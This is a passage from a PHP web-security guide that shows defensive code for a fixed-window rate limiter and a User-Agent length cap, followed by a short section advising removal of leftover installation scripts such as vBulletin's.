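    // True if the request may proceed, false once the client exceeds $limit in a window
    public function allow(string $clientKey, int $now): bool {
        list($start, $count) = $this->counters[$clientKey] ?? [$now, 0];
        if ($now - $start >= $this->windowSeconds) {   // window expired: start a new one
            $start = $now;
            $count = 0;
        }
        $count++;
        $this->counters[$clientKey] = [$start, $count];
        return $count <= $this->limit;
    }
}

// A User-Agent has no business being larger than this; cap it before it reaches the database
function boundedUserAgent(string $ua): string {
    return substr($ua, 0, 255);
}

$limiter = new FixedWindowLimiter(5, 60);
$t0 = 1000000;   // constructed clock, in seconds
$decisions = [];
for ($i = 0; $i < 7; $i++) {
    $decisions[] = $limiter->allow('203.0.113.10', $t0 + $i);   // seven hits inside one window
}
$decisions[] = $limiter->allow('203.0.113.10', $t0 + 61);       // first hit of the next window
echo implode(' ', array_map(function ($ok) { return $ok ? 'allow' : 'deny'; }, $decisions)), "\n";
echo strlen(boundedUserAgent(str_repeat('A', 10000))), "\n";
```

In the web handler the key would be $_SERVER['REMOTE_ADDR'] and the clock time(); a denied request should be answered before anything is written to the database, and the INSERT itself should use a prepared statement as in the SQL Injection section.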
__________________________________________________ _____________
Default Unnecessary Installation Files
We often use install scripts when setting up web applications. If those scripts are not deleted after installation, or an extra install file is left behind, security is compromised.
Someone who reaches this file can obtain control by re-running the installation of the web application.
For example, the install file of vBulletin, if it is not deleted.
Defense
Clean these files after installing your applications.
__________________________________________________ _____________
Turkish Version: https://www.turkhackteam.org/web-server-guvenligi/994636-find-bug-php-system.html